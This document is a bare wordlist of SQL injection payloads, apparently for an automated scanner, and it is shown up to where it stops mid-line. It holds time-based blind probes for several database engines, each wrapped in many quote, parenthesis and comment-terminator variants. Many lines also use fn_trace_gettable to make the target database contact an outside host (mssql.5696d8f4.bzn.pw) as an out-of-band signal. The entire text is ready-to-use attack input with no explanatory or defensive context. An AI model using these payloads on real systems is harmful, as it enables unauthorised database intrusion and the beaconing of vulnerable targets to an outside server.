+BENCHMARK(1000000,MD5('A'))
+SLEEP(10)
+WAITFOR DELAY '00:00:10'
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))
+pg_sleep(10) is not null
||BENCHMARK(1000000,MD5('A'))
||SLEEP(10)
||WAITFOR DELAY '00:00:10'
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))
||pg_sleep(10) is not null
 and BENCHMARK(1000000,MD5('A'))
 and SLEEP(10)
 and WAITFOR DELAY '00:00:10'
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))
 and pg_sleep(10) is not null
+BENCHMARK(1000000,MD5('A'))  -- 
+BENCHMARK(1000000,MD5('A')) /* 
+BENCHMARK(1000000,MD5('A')))  -- 
+BENCHMARK(1000000,MD5('A'))) /* 
+BENCHMARK(1000000,MD5('A'))))  -- 
+BENCHMARK(1000000,MD5('A')))) /* 
+BENCHMARK(1000000,MD5('A')))))  -- 
+BENCHMARK(1000000,MD5('A'))))) /* 
+SLEEP(10)  -- 
+SLEEP(10) /* 
+SLEEP(10))  -- 
+SLEEP(10)) /* 
+SLEEP(10)))  -- 
+SLEEP(10))) /* 
+SLEEP(10))))  -- 
+SLEEP(10)))) /* 
+WAITFOR DELAY '00:00:10'  -- 
+WAITFOR DELAY '00:00:10' /* 
+WAITFOR DELAY '00:00:10')  -- 
+WAITFOR DELAY '00:00:10') /* 
+WAITFOR DELAY '00:00:10'))  -- 
+WAITFOR DELAY '00:00:10')) /* 
+WAITFOR DELAY '00:00:10')))  -- 
+WAITFOR DELAY '00:00:10'))) /* 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
+pg_sleep(10) is not null  -- 
+pg_sleep(10) is not null /* 
+pg_sleep(10) is not null)  -- 
+pg_sleep(10) is not null) /* 
+pg_sleep(10) is not null))  -- 
+pg_sleep(10) is not null)) /* 
+pg_sleep(10) is not null)))  -- 
+pg_sleep(10) is not null))) /* 
||BENCHMARK(1000000,MD5('A'))  -- 
||BENCHMARK(1000000,MD5('A')) /* 
||BENCHMARK(1000000,MD5('A')))  -- 
||BENCHMARK(1000000,MD5('A'))) /* 
||BENCHMARK(1000000,MD5('A'))))  -- 
||BENCHMARK(1000000,MD5('A')))) /* 
||BENCHMARK(1000000,MD5('A')))))  -- 
||BENCHMARK(1000000,MD5('A'))))) /* 
||SLEEP(10)  -- 
||SLEEP(10) /* 
||SLEEP(10))  -- 
||SLEEP(10)) /* 
||SLEEP(10)))  -- 
||SLEEP(10))) /* 
||SLEEP(10))))  -- 
||SLEEP(10)))) /* 
||WAITFOR DELAY '00:00:10'  -- 
||WAITFOR DELAY '00:00:10' /* 
||WAITFOR DELAY '00:00:10')  -- 
||WAITFOR DELAY '00:00:10') /* 
||WAITFOR DELAY '00:00:10'))  -- 
||WAITFOR DELAY '00:00:10')) /* 
||WAITFOR DELAY '00:00:10')))  -- 
||WAITFOR DELAY '00:00:10'))) /* 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
||pg_sleep(10) is not null  -- 
||pg_sleep(10) is not null /* 
||pg_sleep(10) is not null)  -- 
||pg_sleep(10) is not null) /* 
||pg_sleep(10) is not null))  -- 
||pg_sleep(10) is not null)) /* 
||pg_sleep(10) is not null)))  -- 
||pg_sleep(10) is not null))) /* 
 and BENCHMARK(1000000,MD5('A'))  -- 
 and BENCHMARK(1000000,MD5('A')) /* 
 and BENCHMARK(1000000,MD5('A')))  -- 
 and BENCHMARK(1000000,MD5('A'))) /* 
 and BENCHMARK(1000000,MD5('A'))))  -- 
 and BENCHMARK(1000000,MD5('A')))) /* 
 and BENCHMARK(1000000,MD5('A')))))  -- 
 and BENCHMARK(1000000,MD5('A'))))) /* 
 and SLEEP(10)  -- 
 and SLEEP(10) /* 
 and SLEEP(10))  -- 
 and SLEEP(10)) /* 
 and SLEEP(10)))  -- 
 and SLEEP(10))) /* 
 and SLEEP(10))))  -- 
 and SLEEP(10)))) /* 
 and WAITFOR DELAY '00:00:10'  -- 
 and WAITFOR DELAY '00:00:10' /* 
 and WAITFOR DELAY '00:00:10')  -- 
 and WAITFOR DELAY '00:00:10') /* 
 and WAITFOR DELAY '00:00:10'))  -- 
 and WAITFOR DELAY '00:00:10')) /* 
 and WAITFOR DELAY '00:00:10')))  -- 
 and WAITFOR DELAY '00:00:10'))) /* 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
 and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
 and pg_sleep(10) is not null  -- 
 and pg_sleep(10) is not null /* 
 and pg_sleep(10) is not null)  -- 
 and pg_sleep(10) is not null) /* 
 and pg_sleep(10) is not null))  -- 
 and pg_sleep(10) is not null)) /* 
 and pg_sleep(10) is not null)))  -- 
 and pg_sleep(10) is not null))) /* 
'+BENCHMARK(1000000,MD5('A'))+'a
'+SLEEP(10)+'a
'+WAITFOR DELAY '00:00:10'+'a
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))+'a
'+pg_sleep(10) is not null+'a
'||BENCHMARK(1000000,MD5('A'))||'a
'||SLEEP(10)||'a
'||WAITFOR DELAY '00:00:10'||'a
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))||'a
'||pg_sleep(10) is not null||'a
' and BENCHMARK(1000000,MD5('A')) and 'a
' and SLEEP(10) and 'a
' and WAITFOR DELAY '00:00:10' and 'a
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and 'a
' and pg_sleep(10) is not null and 'a
"+BENCHMARK(1000000,MD5('A'))+"a
"+SLEEP(10)+"a
"+WAITFOR DELAY '00:00:10'+"a
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))+"a
"+pg_sleep(10) is not null+"a
"||BENCHMARK(1000000,MD5('A'))||"a
"||SLEEP(10)||"a
"||WAITFOR DELAY '00:00:10'||"a
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))||"a
"||pg_sleep(10) is not null||"a
" and BENCHMARK(1000000,MD5('A')) and "a
" and SLEEP(10) and "a
" and WAITFOR DELAY '00:00:10' and "a
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and "a
" and pg_sleep(10) is not null and "a
')+BENCHMARK(1000000,MD5('A'))+('a
')+SLEEP(10)+('a
')+WAITFOR DELAY '00:00:10'+('a
')+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))+('a
')+pg_sleep(10) is not null+('a
')||BENCHMARK(1000000,MD5('A'))||('a
')||SLEEP(10)||('a
')||WAITFOR DELAY '00:00:10'||('a
')||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))||('a
')||pg_sleep(10) is not null||('a
') and BENCHMARK(1000000,MD5('A')) and ('a
') and SLEEP(10) and ('a
') and WAITFOR DELAY '00:00:10' and ('a
') and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and ('a
') and pg_sleep(10) is not null and ('a
")+BENCHMARK(1000000,MD5('A'))+("a
")+SLEEP(10)+("a
")+WAITFOR DELAY '00:00:10'+("a
")+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))+("a
")+pg_sleep(10) is not null+("a
")||BENCHMARK(1000000,MD5('A'))||("a
")||SLEEP(10)||("a
")||WAITFOR DELAY '00:00:10'||("a
")||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))||("a
")||pg_sleep(10) is not null||("a
") and BENCHMARK(1000000,MD5('A')) and ("a
") and SLEEP(10) and ("a
") and WAITFOR DELAY '00:00:10' and ("a
") and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and ("a
") and pg_sleep(10) is not null and ("a
'+BENCHMARK(1000000,MD5('A'))  -- 
'+BENCHMARK(1000000,MD5('A')) /* 
'+BENCHMARK(1000000,MD5('A')))  -- 
'+BENCHMARK(1000000,MD5('A'))) /* 
'+BENCHMARK(1000000,MD5('A'))))  -- 
'+BENCHMARK(1000000,MD5('A')))) /* 
'+BENCHMARK(1000000,MD5('A')))))  -- 
'+BENCHMARK(1000000,MD5('A'))))) /* 
'+SLEEP(10)  -- 
'+SLEEP(10) /* 
'+SLEEP(10))  -- 
'+SLEEP(10)) /* 
'+SLEEP(10)))  -- 
'+SLEEP(10))) /* 
'+SLEEP(10))))  -- 
'+SLEEP(10)))) /* 
'+WAITFOR DELAY '00:00:10'  -- 
'+WAITFOR DELAY '00:00:10' /* 
'+WAITFOR DELAY '00:00:10')  -- 
'+WAITFOR DELAY '00:00:10') /* 
'+WAITFOR DELAY '00:00:10'))  -- 
'+WAITFOR DELAY '00:00:10')) /* 
'+WAITFOR DELAY '00:00:10')))  -- 
'+WAITFOR DELAY '00:00:10'))) /* 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
'+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
'+pg_sleep(10) is not null  -- 
'+pg_sleep(10) is not null /* 
'+pg_sleep(10) is not null)  -- 
'+pg_sleep(10) is not null) /* 
'+pg_sleep(10) is not null))  -- 
'+pg_sleep(10) is not null)) /* 
'+pg_sleep(10) is not null)))  -- 
'+pg_sleep(10) is not null))) /* 
'||BENCHMARK(1000000,MD5('A'))  -- 
'||BENCHMARK(1000000,MD5('A')) /* 
'||BENCHMARK(1000000,MD5('A')))  -- 
'||BENCHMARK(1000000,MD5('A'))) /* 
'||BENCHMARK(1000000,MD5('A'))))  -- 
'||BENCHMARK(1000000,MD5('A')))) /* 
'||BENCHMARK(1000000,MD5('A')))))  -- 
'||BENCHMARK(1000000,MD5('A'))))) /* 
'||SLEEP(10)  -- 
'||SLEEP(10) /* 
'||SLEEP(10))  -- 
'||SLEEP(10)) /* 
'||SLEEP(10)))  -- 
'||SLEEP(10))) /* 
'||SLEEP(10))))  -- 
'||SLEEP(10)))) /* 
'||WAITFOR DELAY '00:00:10'  -- 
'||WAITFOR DELAY '00:00:10' /* 
'||WAITFOR DELAY '00:00:10')  -- 
'||WAITFOR DELAY '00:00:10') /* 
'||WAITFOR DELAY '00:00:10'))  -- 
'||WAITFOR DELAY '00:00:10')) /* 
'||WAITFOR DELAY '00:00:10')))  -- 
'||WAITFOR DELAY '00:00:10'))) /* 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
'||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
'||pg_sleep(10) is not null  -- 
'||pg_sleep(10) is not null /* 
'||pg_sleep(10) is not null)  -- 
'||pg_sleep(10) is not null) /* 
'||pg_sleep(10) is not null))  -- 
'||pg_sleep(10) is not null)) /* 
'||pg_sleep(10) is not null)))  -- 
'||pg_sleep(10) is not null))) /* 
' and BENCHMARK(1000000,MD5('A'))  -- 
' and BENCHMARK(1000000,MD5('A')) /* 
' and BENCHMARK(1000000,MD5('A')))  -- 
' and BENCHMARK(1000000,MD5('A'))) /* 
' and BENCHMARK(1000000,MD5('A'))))  -- 
' and BENCHMARK(1000000,MD5('A')))) /* 
' and BENCHMARK(1000000,MD5('A')))))  -- 
' and BENCHMARK(1000000,MD5('A'))))) /* 
' and SLEEP(10)  -- 
' and SLEEP(10) /* 
' and SLEEP(10))  -- 
' and SLEEP(10)) /* 
' and SLEEP(10)))  -- 
' and SLEEP(10))) /* 
' and SLEEP(10))))  -- 
' and SLEEP(10)))) /* 
' and WAITFOR DELAY '00:00:10'  -- 
' and WAITFOR DELAY '00:00:10' /* 
' and WAITFOR DELAY '00:00:10')  -- 
' and WAITFOR DELAY '00:00:10') /* 
' and WAITFOR DELAY '00:00:10'))  -- 
' and WAITFOR DELAY '00:00:10')) /* 
' and WAITFOR DELAY '00:00:10')))  -- 
' and WAITFOR DELAY '00:00:10'))) /* 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
' and pg_sleep(10) is not null  -- 
' and pg_sleep(10) is not null /* 
' and pg_sleep(10) is not null)  -- 
' and pg_sleep(10) is not null) /* 
' and pg_sleep(10) is not null))  -- 
' and pg_sleep(10) is not null)) /* 
' and pg_sleep(10) is not null)))  -- 
' and pg_sleep(10) is not null))) /* 
"+BENCHMARK(1000000,MD5('A'))  -- 
"+BENCHMARK(1000000,MD5('A')) /* 
"+BENCHMARK(1000000,MD5('A')))  -- 
"+BENCHMARK(1000000,MD5('A'))) /* 
"+BENCHMARK(1000000,MD5('A'))))  -- 
"+BENCHMARK(1000000,MD5('A')))) /* 
"+BENCHMARK(1000000,MD5('A')))))  -- 
"+BENCHMARK(1000000,MD5('A'))))) /* 
"+SLEEP(10)  -- 
"+SLEEP(10) /* 
"+SLEEP(10))  -- 
"+SLEEP(10)) /* 
"+SLEEP(10)))  -- 
"+SLEEP(10))) /* 
"+SLEEP(10))))  -- 
"+SLEEP(10)))) /* 
"+WAITFOR DELAY '00:00:10'  -- 
"+WAITFOR DELAY '00:00:10' /* 
"+WAITFOR DELAY '00:00:10')  -- 
"+WAITFOR DELAY '00:00:10') /* 
"+WAITFOR DELAY '00:00:10'))  -- 
"+WAITFOR DELAY '00:00:10')) /* 
"+WAITFOR DELAY '00:00:10')))  -- 
"+WAITFOR DELAY '00:00:10'))) /* 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
"+(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
"+pg_sleep(10) is not null  -- 
"+pg_sleep(10) is not null /* 
"+pg_sleep(10) is not null)  -- 
"+pg_sleep(10) is not null) /* 
"+pg_sleep(10) is not null))  -- 
"+pg_sleep(10) is not null)) /* 
"+pg_sleep(10) is not null)))  -- 
"+pg_sleep(10) is not null))) /* 
"||BENCHMARK(1000000,MD5('A'))  -- 
"||BENCHMARK(1000000,MD5('A')) /* 
"||BENCHMARK(1000000,MD5('A')))  -- 
"||BENCHMARK(1000000,MD5('A'))) /* 
"||BENCHMARK(1000000,MD5('A'))))  -- 
"||BENCHMARK(1000000,MD5('A')))) /* 
"||BENCHMARK(1000000,MD5('A')))))  -- 
"||BENCHMARK(1000000,MD5('A'))))) /* 
"||SLEEP(10)  -- 
"||SLEEP(10) /* 
"||SLEEP(10))  -- 
"||SLEEP(10)) /* 
"||SLEEP(10)))  -- 
"||SLEEP(10))) /* 
"||SLEEP(10))))  -- 
"||SLEEP(10)))) /* 
"||WAITFOR DELAY '00:00:10'  -- 
"||WAITFOR DELAY '00:00:10' /* 
"||WAITFOR DELAY '00:00:10')  -- 
"||WAITFOR DELAY '00:00:10') /* 
"||WAITFOR DELAY '00:00:10'))  -- 
"||WAITFOR DELAY '00:00:10')) /* 
"||WAITFOR DELAY '00:00:10')))  -- 
"||WAITFOR DELAY '00:00:10'))) /* 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
"||(select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
"||pg_sleep(10) is not null  -- 
"||pg_sleep(10) is not null /* 
"||pg_sleep(10) is not null)  -- 
"||pg_sleep(10) is not null) /* 
"||pg_sleep(10) is not null))  -- 
"||pg_sleep(10) is not null)) /* 
"||pg_sleep(10) is not null)))  -- 
"||pg_sleep(10) is not null))) /* 
" and BENCHMARK(1000000,MD5('A'))  -- 
" and BENCHMARK(1000000,MD5('A')) /* 
" and BENCHMARK(1000000,MD5('A')))  -- 
" and BENCHMARK(1000000,MD5('A'))) /* 
" and BENCHMARK(1000000,MD5('A'))))  -- 
" and BENCHMARK(1000000,MD5('A')))) /* 
" and BENCHMARK(1000000,MD5('A')))))  -- 
" and BENCHMARK(1000000,MD5('A'))))) /* 
" and SLEEP(10)  -- 
" and SLEEP(10) /* 
" and SLEEP(10))  -- 
" and SLEEP(10)) /* 
" and SLEEP(10)))  -- 
" and SLEEP(10))) /* 
" and SLEEP(10))))  -- 
" and SLEEP(10)))) /* 
" and WAITFOR DELAY '00:00:10'  -- 
" and WAITFOR DELAY '00:00:10' /* 
" and WAITFOR DELAY '00:00:10')  -- 
" and WAITFOR DELAY '00:00:10') /* 
" and WAITFOR DELAY '00:00:10'))  -- 
" and WAITFOR DELAY '00:00:10')) /* 
" and WAITFOR DELAY '00:00:10')))  -- 
" and WAITFOR DELAY '00:00:10'))) /* 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))  -- 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) /* 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
" and pg_sleep(10) is not null  -- 
" and pg_sleep(10) is not null /* 
" and pg_sleep(10) is not null)  -- 
" and pg_sleep(10) is not null) /* 
" and pg_sleep(10) is not null))  -- 
" and pg_sleep(10) is not null)) /* 
" and pg_sleep(10) is not null)))  -- 
" and pg_sleep(10) is not null))) /* 
' and BENCHMARK(1000000,MD5('A')) and '1'='a
' and SLEEP(10) and '1'='a
' and WAITFOR DELAY '00:00:10' and '1'='a
' and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and '1'='a
' and pg_sleep(10) is not null and '1'='a
" and BENCHMARK(1000000,MD5('A')) and "1"="a
" and SLEEP(10) and "1"="a
" and WAITFOR DELAY '00:00:10' and "1"="a
" and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and "1"="a
" and pg_sleep(10) is not null and "1"="a
') and BENCHMARK(1000000,MD5('A')) and ('1'='a
') and SLEEP(10) and ('1'='a
') and WAITFOR DELAY '00:00:10' and ('1'='a
') and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and ('1'='a
') and pg_sleep(10) is not null and ('1'='a
") and BENCHMARK(1000000,MD5('A')) and ("1"="a
") and SLEEP(10) and ("1"="a
") and WAITFOR DELAY '00:00:10' and ("1"="a
") and (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)) and ("1"="a
") and pg_sleep(10) is not null and ("1"="a
(BENCHMARK(1000000,MD5('A')))
(SLEEP(10))
(WAITFOR DELAY '00:00:10')
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))
(pg_sleep(10) is not null)
(BENCHMARK(1000000,MD5('A')))  -- 
(BENCHMARK(1000000,MD5('A'))) /* 
(BENCHMARK(1000000,MD5('A'))))  -- 
(BENCHMARK(1000000,MD5('A')))) /* 
(BENCHMARK(1000000,MD5('A')))))  -- 
(BENCHMARK(1000000,MD5('A'))))) /* 
(BENCHMARK(1000000,MD5('A'))))))  -- 
(BENCHMARK(1000000,MD5('A')))))) /* 
(SLEEP(10))  -- 
(SLEEP(10)) /* 
(SLEEP(10)))  -- 
(SLEEP(10))) /* 
(SLEEP(10))))  -- 
(SLEEP(10)))) /* 
(SLEEP(10)))))  -- 
(SLEEP(10))))) /* 
(WAITFOR DELAY '00:00:10')  -- 
(WAITFOR DELAY '00:00:10') /* 
(WAITFOR DELAY '00:00:10'))  -- 
(WAITFOR DELAY '00:00:10')) /* 
(WAITFOR DELAY '00:00:10')))  -- 
(WAITFOR DELAY '00:00:10'))) /* 
(WAITFOR DELAY '00:00:10'))))  -- 
(WAITFOR DELAY '00:00:10')))) /* 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))  -- 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))) /* 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))  -- 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))) /* 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))  -- 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))) /* 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default))))))  -- 
((select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)))))) /* 
(pg_sleep(10) is not null)  -- 
(pg_sleep(10) is not null) /* 
(pg_sleep(10) is not null))  -- 
(pg_sleep(10) is not null)) /* 
(pg_sleep(10) is not null)))  -- 
(pg_sleep(10) is not null))) /* 
(pg_sleep(10) is not null))))  -- 
(pg_sleep(10) is not null)))) /* 
; BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
; BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
; WAITFOR DELAY '00:00:10';  -- 
; WAITFOR DELAY '00:00:10'; /* 
; select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
; select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
; select BENCHMARK(1000000,MD5('A'));  -- 
; select BENCHMARK(1000000,MD5('A')); /* 
; select SLEEP(10);  -- 
; select SLEEP(10); /* 
; select WAITFOR DELAY '00:00:10';  -- 
; select WAITFOR DELAY '00:00:10'; /* 
; select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
; select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
; select pg_sleep(10) is not null;  -- 
; select pg_sleep(10) is not null; /* 
); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
); WAITFOR DELAY '00:00:10';  -- 
); WAITFOR DELAY '00:00:10'; /* 
); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
); select BENCHMARK(1000000,MD5('A'));  -- 
); select BENCHMARK(1000000,MD5('A')); /* 
); select SLEEP(10);  -- 
); select SLEEP(10); /* 
); select WAITFOR DELAY '00:00:10';  -- 
); select WAITFOR DELAY '00:00:10'; /* 
); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
); select pg_sleep(10) is not null;  -- 
); select pg_sleep(10) is not null; /* 
)); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
)); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
)); WAITFOR DELAY '00:00:10';  -- 
)); WAITFOR DELAY '00:00:10'; /* 
)); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
)); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
)); select BENCHMARK(1000000,MD5('A'));  -- 
)); select BENCHMARK(1000000,MD5('A')); /* 
)); select SLEEP(10);  -- 
)); select SLEEP(10); /* 
)); select WAITFOR DELAY '00:00:10';  -- 
)); select WAITFOR DELAY '00:00:10'; /* 
)); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
)); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
)); select pg_sleep(10) is not null;  -- 
)); select pg_sleep(10) is not null; /* 
))); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
))); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
))); WAITFOR DELAY '00:00:10';  -- 
))); WAITFOR DELAY '00:00:10'; /* 
))); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
))); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
))); select BENCHMARK(1000000,MD5('A'));  -- 
))); select BENCHMARK(1000000,MD5('A')); /* 
))); select SLEEP(10);  -- 
))); select SLEEP(10); /* 
))); select WAITFOR DELAY '00:00:10';  -- 
))); select WAITFOR DELAY '00:00:10'; /* 
))); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
))); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
))); select pg_sleep(10) is not null;  -- 
))); select pg_sleep(10) is not null; /* 
'; BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
'; BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
'; WAITFOR DELAY '00:00:10';  -- 
'; WAITFOR DELAY '00:00:10'; /* 
'; select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
